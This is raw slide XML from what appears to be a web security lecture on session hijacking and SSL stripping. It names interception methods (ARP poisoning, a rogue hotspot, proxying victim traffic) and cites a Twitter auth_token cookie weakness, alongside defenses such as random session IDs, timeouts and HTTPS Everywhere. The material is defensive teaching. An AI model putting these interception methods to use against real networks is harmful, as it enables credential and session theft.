              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="295" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64527" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF9CE804-7987-E640-A76C-3F6B2044971F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1079500" y="6172200"/>
            <a:ext cx="7902575"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5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Time out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session IDs and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>them once  the session ends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1888"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.com/files/119773/twitter-cookie.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64528" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1782CBBD-478B-5447-84A9-E03E8A503C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8153400" y="1739900"/>
            <a:ext cx="1739900" cy="16637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64529" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DEF7AC-C681-AE40-818C-9FC14CBAEAA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="398463" y="3813175"/>
            <a:ext cx="3598862"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9" tIns="45637" rIns="91279" bIns="45637">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400" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>auth_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="C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D993EE8C-FC00-3E4B-8135-AC2D0472748A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="312738"/>
            <a:ext cx="8515350" cy="615950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSL Strip (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C92BEE-685C-6F49-886C-289133F8A58A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="2597150"/>
            <a:ext cx="7918450" cy="428625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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pic>
        <p:nvPicPr>
          <p:cNvPr id="65540" name="Picture 2" descr="Related image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B638DFF-1217-3544-948B-6C38FF121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1597025"/>
            <a:ext cx="9920287"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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61ED23D2-A897-004D-AD7D-68BAC27135C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2400300" y="2959100"/>
            <a:ext cx="526415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00" indent="-12573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6000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adding state to  the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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FD74A2-F27B-624A-B851-218E68CBB1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54225"/>
            <a:ext cx="6553200" cy="396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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C63EE24-282D-8B48-9923-F057AB2B4D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="982663" y="1219200"/>
            <a:ext cx="91106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400"/>
              <a:t>All the traffic from the victim’s machine will flow via your computer that serves as a Proxy server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0837CA99-163A-DC49-AC9D-88FC3F2F239C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="6018213"/>
            <a:ext cx="9601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a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Philosopher"/>
              </a:rPr>
              <a:t>SSL Strip attacks can be implemented in a number of ways. Three of the most common methods are listed below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Philosopher"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Philosopher"/>
              </a:rPr>
              <a:t>Manually set the proxy of the browser to route all traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Philosopher"/>
              </a:rPr>
              <a:t>ARP Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Philosopher"/>
              </a:rPr>
              <a:t>Create a Hotspot and allow the victims connect to it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67589" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C251AF5-BD78-984C-B651-BC154D3C14C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="312738"/>
            <a:ext cx="8515350" cy="615950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSL Strip (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4000">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BEA21B87-B36E-A64B-8C48-B1FF1A7F32E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="1270000"/>
            <a:ext cx="8515350" cy="492125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How can users be aware of this attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4048BC5-C493-7147-8B7F-1ECF344CF3D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="312738"/>
            <a:ext cx="85153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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>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396" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="912793" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1369188" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1825584" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="1" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSL Strip (3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4000" kern="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32C8188-F046-5F47-928D-375AAAA1AED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2105025"/>
            <a:ext cx="8924925" cy="4400550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Install either HTTPS Everywhere or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ForceTLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (HTTPS Everywhere is easier to use). This tells your browser to use the SSL versions of web sites, where possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSLstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> does not display a certificate error, but if it does, then do not bypass the warning and do not continue browsing that website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For critical sites, like online banking, go to the HTTPS (SSL) version of the site from your machine while using a secure network, and then bookmark that page. Then, always open the site by accessing the bookmark whenever you want to visit that page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Always check the URL for critical websites with https in the Address bar or in the Hyperlinks.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C76517-EEFE-0D43-950B-4BA876DE4038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="625475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28526" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="10" dirty="0"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="85" dirty="0"/>
              <a:t>Unpredictability</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9029D2BC-5FF0-FB4C-87F2-31FF343C2C30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="23860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E0BE7D20-1304-2141-BE08-1AD26AE8781A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2330450"/>
            <a:ext cx="6770688" cy="4159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Avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>theft </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>guessing; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cookies should</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-180" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B09F2689-C7BE-6A43-BC94-7ED82568172A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="29448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0EED08CC-9EC9-4945-8CD4-E6B85AC0DE53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="35036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7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0872F96C-FD00-824F-8E65-9733F42FF14A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="40624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0A0C25B9-9792-3946-93F3-B51F0CC27CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069975" y="2597150"/>
            <a:ext cx="7918450" cy="1873250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" tIns="291712" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="390468" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t>Randomly</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="25" dirty="0"/>
              <a:t>chosen,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="390468" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Sufficiently</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t>long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="390468" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1100"/>
